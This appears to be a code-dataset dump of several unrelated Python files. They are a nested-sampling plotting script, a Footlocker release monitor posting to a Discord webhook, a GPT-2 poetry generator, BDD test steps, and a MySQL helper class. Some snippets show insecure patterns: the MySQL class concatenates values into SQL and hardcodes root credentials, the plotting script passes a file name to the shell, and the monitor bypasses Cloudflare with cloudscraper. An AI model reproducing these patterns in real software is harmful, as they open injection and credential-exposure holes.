tar.getnames() if nlives[j]+'/'+fdir in name]\n \n #l = os.listdir(fdir)\n #nf = 0\n #for f in l: # count number of files\n # if '_stats.txt' in f:\n # nf += 1\n\n a = []\n for lpv in lpdirs:\n if lpv[0].isfile():\n if '_stats.txt' in lpv[1]:\n fp = tar.extractfile(lpv[0])\n a.append([float(v.strip()) for v in fp.readline().split()])\n elif pfile in lpv[1]:\n # get limits from prior file\n fp = tar.extractfile(lpv[0])\n l = fp.readline().split()\n maxv = float(l[-1].strip())\n maxranges[lname].append(maxv)\n \n for lpv in lpdirs: # run again so that maxv is alway defined\n if lpv[0].isfile():\n if truefile in lpv[1]:\n # get true values of evidence and upper limits\n fp = tar.extractfile(lpv[0])\n l = fp.readline().split()\n trueevs[lname].append(float(l[0].strip()))\n trueuls[lname].append(float(l[1].strip())) \n #truekls[lname].append(float(l[2].strip())) # this value was wrongly calculated\n truekls[lname].append(kltrue(maxv, 1e-24, trueevs[lname][-1]))\n\n a = np.array(a)\n\n # concatenate output of 'stats' files and parse it\n #p = (sp.check_output(\"cat \"+os.path.join(fdir, oformat), shell=True)).split('\\n')\n #a = np.array([[float(v.strip()) for v in l.split()] for l in p if len(l.split()) == 4])\n\n #if a.shape[0] != nf:\n # print(\"Warning... number of files ('%d') and number of values read in ('%d') is not consistent.\" % (nf, a.shape[0]), file=sys.stderr)\n\n evidences[lname].append(a[:,0])\n upperlimits[lname].append(a[:,1])\n evidenceerrs[lname].append(a[:,2])\n kspvalues[lname].append(a[:,3])\n\n if a.shape[1] == 5:\n timings[lname].append(a[:,4])\n else:\n timings = None\n\n # get limits\n #if not os.path.isfile(os.path.join(fdir, pfile)):\n # print(\"Error... no prior file given in '%s'\" % fdir, file=sys.stderr)\n # sys.exit(1)\n\n #fp = open(os.path.join(fdir, pfile), 'r')\n #l = fp.readline().split()\n #fp.close()\n #maxv = float(l[-1].strip())\n #maxranges[lname].append(maxv)\n\n # get true values of evidence and upper limits\n #if not os.path.isfile(os.path.join(fdir, truefile)):\n # print(\"Error... no 'true value' file given in '%s'\" % fdir, file=sys.stderr)\n # sys.exit(1)\n\n #fp = open(os.path.join(fdir, truefile), 'r')\n #l = fp.readline().split()\n #fp.close()\n #trueevs[lname].append(float(l[0].strip()))\n #trueuls[lname].append(float(l[1].strip()))\n #truekls[lname].append(float(l[2].strip())) # this value was wrongly calculated\n #truekls[lname].append(kltrue(maxv, 1e-24, trueevs[lname][-1]))\n\n #print(\"Mean Z = %.7e +/- %.7e, true Z = %.7e\" % (np.mean(evidences[lname][-1]), np.mean(evidenceerrs[lname][-1]), trueevs[lname][-1]), file=sys.stdout)\n\ntar.close()\n\n# create figure for evidences\nfige = pl.figure(figsize=(8,7))\naxe = fige.add_subplot(111)\n\n# create figure for upper limits\nfigul = pl.figure(figsize=(8,7))\naxul = figul.add_subplot(111)\n\n# create figure for the K-S test\nfigks = pl.figure(figsize=(8,7))\naxks = figks.add_subplot(111)\n\n# create figure for timings\nif timings is not None:\n figtim = pl.figure(figsize=(7,6))\n axtim = figtim.add_subplot(111)\n\ncolors = ['blue', 'green', 'red', 'cyan', 'magenta', 'yellow'] # some colours\n\n# proxy patches for legend\nhandles = []\n\n# linear fits to KL divergence vs mean evidence ratio\nlfits = []\n\n# loop over live points in order\nfor j, nlive in enumerate(nlives):\n nlivei = int(nlive)\n\n handles.append(mpatches.Patch(color=colors[j], alpha=0.2, lw=2, label=nlive))\n\n # got linear fit to mean evidence offset vs information\n p = np.polyfit(truekls[nlive], [np.mean(ev-trueevs[nlive][i]) for i, ev in enumerate(evidences[nlive])], deg=1)\n lfits.append(p)\n print(\"N live: %s, linear fit ln(Z/Z_true) = %.2f + %.3f(KL-div)\" % (nlive, p[1], p[0]), file=sys.stdout)\n\n # violin plot for evidence ratios\n logpos = np.log10(maxranges[nlive])\n\n # offset the error bars so they don't overlap\n if len(nlives) > 1:\n dloffset = 0.3*(logpos[1]-logpos[0])\n dlp = 0.6*(logpos[1]-logpos[0])/(len(nlives)-1.)\n else:\n dloffset = 0.\n dlp = 0.\n\n logposoff = logpos-dloffset+j*dlp\n\n vd = axe.violinplot([ev-trueevs[nlive][i] for i, ev in enumerate(evidences[nlive])], logposoff, showextrema=False, showmedians=True, widths=0.09)\n # set colors\n for ps in vd['bodies']:\n ps.set_facecolor(colors[j])\n ps.set_edgecolor(colors[j])\n ps.set_alpha(0.2)\n ps.set_lw(1)\n ps = vd['cmedians']\n ps.set_color(colors[j])\n yerr = [np.mean(ee) for ee in evidenceerrs[nlive]]\n\n axe.errorbar(logposoff, np.zeros(len(logpos)), yerr=[yerr, yerr], fmt='o', capsize=3, capthick=1, color=colors[j], markersize=3)\n\n # add new log-style axis labels\n if j == 0:\n axe.set_xlim([logpos[0]-1, logpos[-1]+1])\n\n axenew = axe.twiny()\n\n # turn-off current (non-log) axis lables\n axe.tick_params(axis='x', which='both', bottom='off', top='off', labelbottom='off')\n axe.xaxis.grid(False)\n\n xlim = axe.get_xlim()\n axenew.set_xlim(10**np.array(xlim))\n axenew.set_xscale('log', nonposx='clip')\n axenew.set_xticks(np.logspace(logpos[0], logpos[-1], len(logpos)))\n axenew.xaxis.set_ticks_position('bottom')\n axenew.xaxis.grid(b=True, which='minor', color='k', linestyle='--', linewidth=0.5, alpha=0.3)\n\n axenew.set_xlabel('Prior range')\n axenew.xaxis.set_label_position('bottom')\n axe.set_ylabel(r'$\\ln{(\\mathcal{Z}/\\mathcal{Z}_{\\rm true})}$')\n\n # add the KL divergence (information gain)\n axenew2 = axenew.twiny()\n axenew2.grid(b=False)\n axenew2.set_xticks(logpos)\n axenew2.set_xbound(axe.get_xbound())\n axenew2.set_xticklabels(['$%.1f$' % yv for yv in truekls[nlive]])\n axenew2.set_xlabel('Information Gain (nats)')\n\n # show equivalent percentage evidence (not log evidence) offsets\n if j == len(nlives)-1: # only do for last set\n ayenew = axe.twinx()\n DZmin, DZmax = axe.get_ybound()\n pDZvals = np.arange(np.around(100.*(np.exp(DZmin)-1.), decimals=-1), np.around(100.*(np.exp(DZmax)-1.), decimals=-1), 50)\n equivlnZ = np.log((pDZvals/100.)+1.)\n\n ayenew.grid(b=False)\n ayenew.set_yticks(equivlnZ)\n ayenew.set_ybound(axe.get_ybound())\n\n ayenew.get_yaxis().set_tick_params(which='both', direction='out')\n ayenew.set_yticklabels(['$%d$' % yv for yv in pDZvals])\n ayenew.set_ylabel(r'$(\\mathcal{Z}-\\mathcal{Z}_{\\rm true})/\\mathcal{Z}_{\\rm true} \\%$')\n\n # produce violin plot of h0 upper limits\n vd = axul.violinplot(upperlimits[nlive], logposoff, showextrema=False, showmedians=True, widths=0.09)\n for ps in vd['bodies']:\n ps.set_facecolor(colors[j])\n ps.set_alpha(0.2)\n ps.set_edgecolor(colors[j])\n ps.set_lw(1)\n ps = vd['cmedians']\n ps.set_color(colors[j])\n\n if j == 0:\n axul.set_xlim([logpos[0]-1, logpos[-1]+1])\n\n axulnew = axul.twiny()\n\n # turn-off current (non-log) axis lables\n axul.tick_params(axis='x', which='both', bottom='off', top='off', labelbottom='off')\n axul.xaxis.grid(False)\n\n # plot true analytic upper limit\n xlim = axul.get_xlim()\n axul.plot(xlim, [trueuls[nlive][0], trueuls[nlive][0]], 'r--')\n\n axulnew.set_xlim(10**np.array(xlim))\n axulnew.set_xscale('log', nonposx='clip')\n axulnew.set_xticks(np.logspace(logpos[0], logpos[-1], len(logpos)))\n axulnew.xaxis.set_ticks_position('bottom')\n axulnew.xaxis.grid(b=True, which='minor', color='k', linestyle='--', linewidth=0.5, alpha=0.3)\n\n axulnew.set_xlabel('Prior range')\n axulnew.xaxis.set_label_position('bottom')\n axul.set_ylabel(r'95\\% credible upper limit')\n\n # convert into a fractional upper limit difference\n if j == len(nlives)-1:\n ayulnew = axul.twinx()\n ulmin, ulmax = axul.get_ybound()\n pdulvals = np.flipud(-np.arange(0., -np.floor(100.*(ulmin-trueuls[nlive][0])/trueuls[nlive][0]), 4))\n pdulvals = np.concatenate((pdulvals, np.arange(4., np.floor(100.*(ulmax-trueuls[nlive][0])/trueuls[nlive][0]), 4)))\n equivuls = ((pdulvals/100.)*trueuls[nlive][0]) + trueuls[nlive][0]\n\n ayulnew.grid(b=False)\n ayulnew.set_yticks(equivuls)\n ayulnew.set_ybound(axul.get_ybound())\n\n ayulnew.get_yaxis().set_tick_params(which='both', direction='out')\n ayulnew.set_yticklabels(['$%d$' % yv for yv in pdulvals])\n ayulnew.set_ylabel(r'$({\\rm UL}-{\\rm UL}_{\\rm true})/{\\rm UL}_{\\rm true} \\%$')\n\n # produce violin plots of K-S test p-values\n vd = axks.violinplot([np.log10(v[v > 0.0]) for v in kspvalues[nlive]], logposoff, showextrema=False, showmedians=True, widths=0.09)\n for ps in vd['bodies']:\n ps.set_facecolor(colors[j])\n ps.set_alpha(0.2)\n ps.set_edgecolor(colors[j])\n ps.set_lw(1)\n ps = vd['cmedians']\n ps.set_color(colors[j])\n\n if j == 0:\n axks.set_xlim([logpos[0]-1, logpos[-1]+1])\n\n axksnew = axks.twiny()\n\n # turn-off current (non-log) axis lables\n axks.tick_params(axis='x', which='both', bottom='off', top='off', labelbottom='off')\n axks.xaxis.grid(False)\n\n xlim = axks.get_xlim()\n axksnew.set_xlim(10**np.array(xlim))\n axksnew.set_xscale('log', nonposx='clip')\n axksnew.set_xticks(np.logspace(logpos[0], logpos[-1], len(logpos)))\n axksnew.xaxis.set_ticks_position('bottom')\n axksnew.xaxis.grid(b=True, which='minor', color='k', linestyle='--', linewidth=0.5, alpha=0.3)\n\n axksnew.set_xlabel('Prior range')\n axksnew.xaxis.set_label_position('bottom')\n\n ayksnew = axks.twinx()\n axks.tick_params(axis='y', which='both', left='off', right='off', labelleft='off')\n ylim = axks.get_ylim()\n ayksnew.set_ylim(10**np.array(ylim))\n ayksnew.set_yscale('log', nonposx='clip')\n ayksnew.yaxis.set_ticks_position('left')\n ayksnew.set_ylabel(r'KS test $p$-values')\n ayksnew.yaxis.set_label_position('left')\n\n logposoff = logpos-dloffset+j*dlp\n\n if timings is not None:\n timescaling = 5.9e-6\n #print(kloff)\n #print(np.array(timings[nlive]).shape)\n vd = axtim.violinplot((1e-6)*np.array(timings[nlive]).T/timescaling, truekls[nlive], showextrema=False, showmedians=True)\n for ps in vd['bodies']:\n ps.set_facecolor(colors[j])\n ps.set_alpha(0.2)\n ps.set_edgecolor(colors[j])\n ps.set_lw(1)\n ps = vd['cmedians']\n ps.set_color(colors[j])\n \n # get linear fit to mean evidence offset vs information\n #p = np.polyfit(truekls[nlive], [np.median(tims)/timescaling for tims in timings[nlive]], deg=1)\n #print(\"N live: %s, linear fit T = %.2f + %.3f(KL-div)\" % (nlive, p[1], p[0]), file=sys.stdout)\n #if j == 0:\n # print(truekls)\n #print([np.median(tims)/timescaling for tims in timings[nlive]])\n\n# add legend\naxe.legend(handles=handles, loc='upper left')\naxul.legend(handles=handles, loc='best')\naxks.legend(handles=handles, loc='lower left')\n\nfige.tight_layout()\nfigul.tight_layout()\nfigks.tight_layout()\n\nfige.savefig(opts.outfile+'_evidences.png', dpi=300)\nfige.savefig(opts.outfile+'_evidences.pdf')\np = sp.Popen('pdftops -eps %s' % opts.outfile+'_evidences.pdf', shell=True)\np.communicate()\n\nfigul.savefig(opts.outfile+'_uls.png', dpi=300)\nfigul.savefig(opts.outfile+'_uls.pdf')\np = sp.Popen('pdftops -eps %s' % opts.outfile+'_uls.pdf', shell=True)\np.communicate()\n\nfigks.savefig(opts.outfile+'_ks.png', dpi=300)\nfigks.savefig(opts.outfile+'_ks.pdf')\np = sp.Popen('pdftops -eps %s' % opts.outfile+'_ks.pdf', shell=True)\np.communicate()\n\nif timings is not None:\n axtim.set_yscale('log')\n axtim.legend(handles=handles, loc='lower right')\n axtim.set_xlabel('Information Gain (nats)')\n axtim.set_ylabel(r'run time ($10^6 \\mathcal{T}_{L}$)')\n figtim.tight_layout()\n figtim.savefig(opts.outfile+'_timings.png', dpi=300)\n figtim.savefig(opts.outfile+'_timings.pdf')\n p = sp.Popen('pdftops -eps %s' % opts.outfile+'_timings.pdf', shell=True)\n p.communicate()","repo_name":"mattpitkin/CW_nested_sampling_doc","sub_path":"figures/proptesting/collate_test_gauss.py","file_name":"collate_test_gauss.py","file_ext":"py","file_size_in_byte":15697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"30388609018","text":"from datetime import datetime\r\nimport cloudscraper\r\nimport requests\r\nimport time\r\nimport json\r\n\r\n# Import the ids already in the monitor\r\nmonitor = []\r\ntry:\r\n with open('monitor.txt', 'r') as f:\r\n for line in f:\r\n monitor.append(line.strip())\r\nexcept:\r\n pass\r\n\r\n# Import the data from the config.json file\r\ntry:\r\n with open('config.json') as config_file:\r\n config = json.load(config_file)\r\nexcept:\r\n print(\"No config.json found\")\r\n exit()\r\n\r\n# Config variables\r\nwebhook_url = config['webhook_url']\r\navatar = config['avatar_url']\r\ncountry = config['country']\r\ntimeout = config['timeout']\r\nhookname = config['name']\r\nsleep = config['sleep']\r\n\r\n# Url for the request\r\nurl = f\"https://www.footlocker.{country}/apigate/release-calendar\"\r\n\r\n# Function to send the webhook and save the id\r\ndef sendWebhook(url, data, id):\r\n\r\n global monitor\r\n response = requests.post(url, json = data)\r\n time.sleep(0.5)\r\n if(response.status_code == 429):\r\n print(\"Rate limited\")\r\n time.sleep(10)\r\n \r\n else:\r\n monitor.append(str(id)) \r\n with open('monitor.txt', 'a') as f:\r\n f.write(f\"{id}\\n\")\r\n\r\n return response.status_code\r\n\r\n# Function to get the request and catchs the errors\r\ndef getRealeses(url):\r\n try:\r\n scraper = cloudscraper.create_scraper()\r\n response = scraper.get(url)\r\n if response.status_code == 200:\r\n return response.json()\r\n else:\r\n print(response.status_code)\r\n return None\r\n except Exception as e:\r\n print(e)\r\n return None\r\n\r\n# Main loop for track the releases \r\nwhile True:\r\n\r\n # Get the data from the request and the time\r\n data = getRealeses(url)\r\n now = time.time()\r\n print(\"Checking\\n\")\r\n \r\n # If the data is not None\r\n if data:\r\n\r\n try:\r\n # For loop for get all the releases\r\n size = len(data['releaseCalendarProducts']) \r\n for release in data['releaseCalendarProducts']:\r\n\r\n # Get the data of the release\r\n name = release['name']\r\n brand = release['brandName']\r\n id = release['id']\r\n img = release['image']\r\n gender = release['gender']\r\n launch = release['skuLaunchDate']\r\n link = f\"https://www.footlocker.{country}\" + release['pdpLink'] \r\n \r\n # Format the data\r\n info = {\r\n \"username\": hookname,\r\n \"avatar_url\": avatar,\r\n \"embeds\": [\r\n {\r\n \"title\" : name,\r\n \"url\": link,\r\n \"description\" : f\"**Name**: {name}\\n**Brand**: {brand}\\n**Gender**: {gender}\\n**Id**: {id}\\n\\n**Launch**: {launch}\\n\",\r\n \"color\": 14957809,\r\n \"thumbnail\": {\"url\": img}\r\n }\r\n ]\r\n }\r\n \r\n if \"hasStock\" in release:\r\n stock = release['hasStock']\r\n else:\r\n continue\r\n\r\n # If the release has no stock and its not launched yet and its not in the monitor\r\n fix = time.mktime(datetime.strptime(launch, \"%b %d %Y %H:%M:%S GMT+0000\").timetuple()) \r\n if(id not in monitor and fix > now):\r\n\r\n # Send the webhook\r\n code = sendWebhook(webhook_url, info, id)\r\n print(f\"Name: {name} - Id: {id}\") \r\n print(f\"Sent webhook {code}\\n\") \r\n\r\n except Exception as e:\r\n print(e)\r\n data = None\r\n\r\n # Catch the errors\r\n if not data:\r\n print(\"Error\")\r\n time.sleep(timeout)\r\n\r\n time.sleep(sleep)\r\n","repo_name":"Arqaen/Footlocker-Releases","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36826467748","text":"\nimport json\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\n\nfrom src import model, sample, encoder\n\n\nclass Generator:\n\n\tdef __init__(self,\n\t\t\t\tmodel_name='117M',\n\t\t\t\tseed=None,\n\t\t\t\tbatch_size=6,\n\t\t\t\tlength=1,\n\t\t\t\ttemperature=1,\n\t\t\t\ttop_k=0,\n\t\t\t\ttop_p=0.0,\n\t\t\t\tckpt = 'checkpoint/12-8'\n\t):\n\t\t\"\"\"\n\t\t:model_name=117M : String, which model to use\n\t\t:seed=None : Integer seed for random number generators, fix seed to reproduce\n\t\t results\n\t\t:batch_size=1 : Number of batches (only affects speed/memory).\n\t\t:length=None : Number of tokens in generated text, if None (default), is\n\t\t determined by model hyperparameters\n\t\t:temperature=1 : Float value controlling randomness in boltzmann\n\t\t distribution. Lower temperature results in less random completions. As the\n\t\t temperature approaches zero, the model will become deterministic and\n\t\t repetitive. Higher temperature results in more random completions.\n\t\t:top_k=0 : Integer value controlling diversity. 1 means only 1 word is\n\t\t considered for each step (token), resulting in deterministic completions,\n\t\t while 40 means 40 words are considered at each step. 0 (default) is a\n\t\t special setting meaning no restrictions. 40 generally is a good value.\n\t\t:top_p=0.0 : Float value controlling diversity. Implements nucleus sampling,\n\t\t overriding top_k if set to a value > 0. A good setting is 0.9.\n\t\t\"\"\"\n\n\t\tself.seed = seed\n\t\tself.batch_size = batch_size\t\t\n\t\tself.enc = encoder.get_encoder(model_name)\n\t\tself.hparams = model.default_hparams()\n\t\tself.temperature=temperature\n\t\tself.top_k = top_k\n\t\tself.top_p = top_p\n\t\tself.model_name = model_name\n\t\tself.length = length\n\t\tself.endoftext = self.enc.encode('<|endoftext|>')\n\n\t\tif ckpt:\n\t\t\tself.ckpt = ckpt\n\t\telse:\n\t\t\tself.ckpt = os.path.join('models', self.model_name)\n\n\t\twith open(os.path.join('models', model_name, 'hparams.json')) as f:\n\t\t\tself.hparams.override_from_dict(json.load(f))\n\t\tif length is None:\n\t\t\tlength = self.hparams.n_ctx // 2\n\t\telif length > self.hparams.n_ctx:\n\t\t\traise ValueError(\"Can't get samples longer than window size: %s\" % hparams.n_ctx)\n\n\n\tdef generate(self, prompt=''):\n\t\twith tf.Session(graph=tf.Graph()) as sess:\n\n\t\t\tnp.random.seed(self.seed)\n\t\t\ttf.set_random_seed(self.seed)\n\n\t\t\t# enc.encoder['<|endoftext|>'] is different and does worse\n\t\t\tprompt = '<|endoftext|>'+prompt\n\n\t\t\t# if not prompt:\n\t\t\t# \tstart_token = self.enc.encoder['<|endoftext|>']\n\t\t\t\n\t\t\t\n\t\t\tcontext = tf.placeholder(tf.int32, [self.batch_size, None])\n\n\t\t\toutput = sample.sample_sequence(\n\t\t\t\thparams=self.hparams, length=self.length,\n\t\t\t\tcontext=context,\n\t\t\t\tbatch_size=self.batch_size,\n\t\t\t\ttemperature=self.temperature, top_k=self.top_k, top_p=self.top_p\n\t\t\t)\n\n\t\t\tsaver = tf.train.Saver()\n\t\t\tckpt = tf.train.latest_checkpoint(self.ckpt)\n\t\t\tsaver.restore(sess, ckpt)\t\n\n\t\t\tcontext_tokens = self.enc.encode(prompt)\n\t\t\tauto_accept = 0\n\t\t\twhile True:\n\t\t\t\t# save old text to show in decision\n\t\t\t\tpre_token_text = self.enc.decode(context_tokens[len(self.endoftext):]) \n\t\t\t\t# generate token batch\n\t\t\t\t#\tcontext_tokens.copy() to avoid modifying context_tokens\n\t\t\t\tnew_tokens = self.get_output(output, sess, context, context_tokens.copy())\n\t\t\t\t# iterate through batch until token selected or all of batch shown\n\t\t\t\tfor new_token in new_tokens:\n\t\t\t\t\t# decode token\n\t\t\t\t\tnew_text = self.enc.decode(new_token)\n\t\t\t\t\tif not auto_accept:\n\t\t\t\t\t\t# decide token\n\t\t\t\t\t\tnew_text, reset_prompt = self.decide(new_text, pre_token_text)\n\t\t\t\t\t\tif reset_prompt:\n\t\t\t\t\t\t\tif type(reset_prompt) == int:\n\t\t\t\t\t\t\t\tauto_accept = max(0, reset_prompt-1)\n\t\t\t\t\t\t\telif type(reset_prompt) == bool:\n\t\t\t\t\t\t\t\tcontext_tokens = self.enc.encode(prompt)\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t# backtrack if required\n\t\t\t\t\t\telif type(new_text) == int and new_text > 0:\n\t\t\t\t\t\t\tnew_text = min(new_text, len(context_tokens)-len(self.endoftext))\n\t\t\t\t\t\t\tcontext_tokens = context_tokens[:-new_text]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tauto_accept -= 1\n\t\t\t\t\t# update context\n\t\t\t\t\tif new_text:\n\t\t\t\t\t\tcontext_tokens += self.enc.encode(new_text)\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\n\n\t\t\treturn text\n\n\n\n\tdef get_output(self, output, sess, context, context_tokens):\n\t\t# get tokens\n\t\tif context != None:\n\t\t\t# conditional generation\n\t\t\ttokens, logits = sess.run(output, feed_dict={\n\t\t\t\tcontext: [context_tokens for _ in range(self.batch_size)]\n\t\t\t})\n\t\t\t# extract newly generated token (discard context)\n\t\t\ttokens = tokens[:, len(context_tokens):]\n\t\telse:\n\t\t\t# unconditional generation\n\t\t\t# get generated token (there is no context to discard here)\n\t\t\ttokens, logits = sess.run(output)\n\n\t\treturn tokens\n\n\tdef decide(self, new_text, old_text):\n\t\t# '\\x7f':del, '\\x1b':arrowkey, '\\r':enter, '\\\\': del chunk and 's':save\n\t\t#\t\tinterrupt = \\x03:ctr-c or \\x1a:ctrl-z or 'q'\n\n\t\treset_prompt = False\n\t\t# loop until decision received\n\t\tdecision_received = False\n\t\twhile not decision_received:\n\t\t\t# assume user inputs correctly, correct if they don't\n\t\t\tdecision_received = True\n\t\t\tos.system('clear')\n\t\t\tprint('\\033[A\\033[2K')\n\t\t\tprint(\"{}::{}\".format(old_text, new_text), end='', flush=True)\n\t\t\t# get user feedback\n\t\t\tchar = getch()\n\t\t\tif char == '\\x7f': # reject token\n\t\t\t\tnew_text = ''\n\t\t\telif char == '\\x1b': # custom text\n\t\t\t\tnew_text = self.get_custom_text(old_text)\n\t\t\telif char == '\\\\': # delete chunk\n\t\t\t\tnew_text = self.delete_chunk(old_text)\n\t\t\telif char == '/': # auto-accept next n chunks\n\t\t\t\treset_prompt = int(self.write_text_get_input(old_text, new_text+\"\\nHow many chunks to auto-accept?::\"))\n\t\t\t\tif reset_prompt == 0:\n\t\t\t\t\tnew_text = ''\n\t\t\telif char == 's':\n\t\t\t\tself.save_poem(old_text)\n\t\t\t\tnew_text = ''\n\t\t\telif char == 'r':\n\t\t\t\tnew_text = ''\n\t\t\t\treset_prompt = True\n\t\t\telif char in ('\\x03', '\\x1a', 'q'):\n\t\t\t\traise Exception(\"Exiting Upon User Request...\")\n\t\t\telif char != '\\r':\n\t\t\t\tdecision_received = False\n\t\t\t\tprint(\"\\n\\npress 'enter' to accept\")\n\t\t\t\tprint(\"press 'delete' to reject\")\n\t\t\t\tprint(\"press an arrowkey to edit\")\n\t\t\t\tprint(\"press backslash to delete chunk\")\n\t\t\t\tprint(\"press fwdslash to auto-accept next n chunks\")\n\t\t\t\tprint(\"press 's' to save\")\n\t\t\t\tprint(\"press 'r' to reset prompt\")\n\t\t\t\tprint(\"press 'q' to quit\\n\")\n\t\t\t\tprint(\"(press any key to acknowledge these instructions.)\\n\", flush=True)\n\t\t\t\t# wait for user acknowledgement of instructions\n\t\t\t\t_ = getch()\n\t\t\t\t# try again (we're in a while loop)\n\n\t\treturn new_text, reset_prompt\n\n\t# helper for self.decide()\n\tdef delete_chunk(self, old_text):\n\t\tos.system('clear')\n\t\tprint('\\033[A\\033[2K')\n\t\ttext_tokens = [self.enc.decode([token]) for token in self.enc.encode(old_text)]\n\t\tn_tokens = len(text_tokens)\n\t\tfor t in range(n_tokens):\n\t\t\ttoken = text_tokens[t]\n\t\t\tprint(str(n_tokens-t-1)+'::'+token)\n\t\tprint('\\n\\n'+'='*15)\n\t\tnew_text = False\n\t\twhile type(new_text) != int:\n\t\t\ttry:\n\t\t\t\tnew_text = min(int(input()), len(text_tokens))\n\t\t\texcept:\n\t\t\t\tprint(\"# Tokens To Remove: \")\n\t\t# # process the enter key\n\t\t# _ = getch()\n\t\t# _ = getch()\n\t\treturn new_text\n\n\t# helper for self.decide()\n\tdef get_custom_text(self, old_text):\n\t\t# get custom text\n\t\tcustom_text = self.write_text_get_input(old_text)\n\t\t# # process the enter key\n\t\t# _ = getch()\n\t\t# _ = getch()\n\t\t# If user immediately pressed 'enter' then that's their input\n\t\tif not custom_text:\n\t\t\tcustom_text = '\\n'\n\n\t\treturn custom_text\n\n\t# write poem to file (ask user for filename)\n\tdef save_poem(self, poem):\n\t\tfilename = ''\n\t\tprompt = ''\n\t\twhile not filename:\n\t\t\tprompt += \"\\nEnter File Name::\"\n\t\t\tfilename = self.write_text_get_input(poem, prompt)\n\t\t\tfilename, prompt = self.is_valid(filename)\n\t\twith open(filename, 'w') as f:\n\t\t\tf.write(poem)\n\t\treturn ''\n\n\t# helper for Generator.save_poem(); returns filename if valid - else empty string\n\tdef is_valid(self, filename):\n\t\tsplit_filename = filename.split('.')\n\t\t# check if input is invalid\n\t\t#\ti.e. if it has extra '.'s or is empty or not alphanumeric\n\t\tvalid_name = True\n\t\tif len(split_filename) > 2 or not split_filename[0]:\n\t\t\tvalid_name = False\n\t\telse:\n\t\t\tfor character in split_filename[0]:\n\t\t\t\tif not character.isalnum() and character not in ('-', '_'):\n\t\t\t\t\tvalid_name = False\n\t\t\t\t\tbreak\n\t\tif not valid_name:\n\t\t\tprompt = \"\\n{} is not a valid filename.\".format(filename)\n\t\t\tfilename = ''\n\t\telse:\n\t\t\t# if user excluded file extension, add it\n\t\t\tif len(split_filename) == 1:\n\t\t\t\tprompt = ''\n\t\t\t\tfilename = filename+'.txt'\n\t\t\t# if file already exists don't overwrite\n\t\t\tif os.path.isfile(filename):\n\t\t\t\tprompt = \"\\n{} already exists. Please enter a different filename.\".format(filename)\n\t\t\t\tfilename = ''\n\n\t\treturn filename, prompt\n\n\n\tdef write_text_get_input(self, text, input_prompt=''):\n\t\tos.system('clear')\n\t\tprint('\\033[A\\033[2K', flush=True)\n\t\tprint(\"{}::\".format(text), end='', flush=True)\n\t\tuser_input = input(input_prompt)\n\t\treturn user_input\n\n\n\nimport sys, termios, tty, os, time\n# capture arrow key stroke \ndef getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n \n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\n\n","repo_name":"joemeyer1/gpt2-poetry","sub_path":"src/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":8959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3232192834","text":"# -*- coding: utf-8 -*-\nimport json\nimport time\n\nfrom behave import *\n\nfrom test import bdd_util\nfrom features.testenv.model_factory import *\n\nfrom django.test.client import Client\nfrom mall.models import *\nfrom modules.member.models import *\n\n@given(u\"{user}登录系统\")\ndef step_impl(context, user):\n\tcontext.client = bdd_util.login(user, password=None, context=context)\n\n@when(u\"{user}添加会员分组\")\ndef step_impl(context, user):\n\t__add_member_tag(context, user)\n\n@given(u\"{user}添加会员分组\")\ndef step_impl(context, user):\n\t__add_member_tag(context, user)\n\ndef __add_member_tag(context, user):\n\tMemberTag.objects.all().delete()\n\tclient = context.client\n\tcontext.member_tags = {}\n\tfor tag_id, tag_name in json.loads(context.text).items():\n\t\tif tag_name != '未分组':\n\t\t\ttag_id = 'tag_id_{}'.format(int(tag_id.split('_')[2]) + 1)\n\t\tcontext.member_tags[tag_id] = tag_name\n\tresponse = client.post('/member/api/member_tags/',\n\t\tcontext.member_tags)\n\n@then(u\"{user}能获取会员分组列表\")\ndef step_impl(context, user):\n\tif hasattr(context, 'client'):\n\t\tcontext.client.logout()\n\tcontext.client = bdd_util.login(user)\n\tclient = context.client\n\n\tresponse = client.get('/member/member_tags/')\n\tmember_tags =response.context['member_tags']\n\ttag_list = []\n\tfor tag in member_tags:\n\t\ttag_list.append({\"name\":tag.name,\"group_membership\":tag.count})\n\texpected = json.loads(context.text)\n\tbdd_util.assert_list(expected, tag_list)\n\n\n@when(u\"{user}更新会员分组\")\ndef step_impl(context, user):\n\tclient = context.client\n\tnew_member_tag = json.loads(context.text)\n\tresponse = client.post('/member/api/member_tags/' ,new_member_tag)\n\n\n@when(u\"{user}删除会员分组\")\ndef step_impl(context, user):\n\tclient = context.client\n\tnew_member_tag = json.loads(context.text)\n\tresponse = client.post('/member/api/member_tags/' ,new_member_tag)\n\n\n\n\n","repo_name":"chengdg/weizoom","sub_path":"weapp/features/steps/member_tag_steps.py","file_name":"member_tag_steps.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3823702413","text":"import pymysql;\nfrom datetime import datetime;\nfrom dateutil.relativedelta import relativedelta;\nimport numpy as np;\nconn = pymysql.connect(host ='localhost',user = 'root', password = 'root', db = 'djangorbi');\nclass MySQL_CAL:\n def GET_TBL_52(self, fluid):\n row = np.zeros(10);\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `MW`,`Density`,`NBP`,`ideal`,`A`,`B`,`C`,`D`,`E`,`Auto` FROM `TBL_52_CA_PROPERTIES_LEVEL_1` WHERE `Fluid` = '\" + fluid + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n row[0] = r[0];\n row[1] = r[1];\n row[2] = r[2];\n row[3] = r[3];\n row[4] = r[4];\n row[5] = r[5];\n row[6] = r[6];\n row[7] = r[7];\n row[8] = r[8];\n row[9] = r[9];\n except pymysql.InternalError as Error:\n print(\"Error! execute table 5.2\");\n return 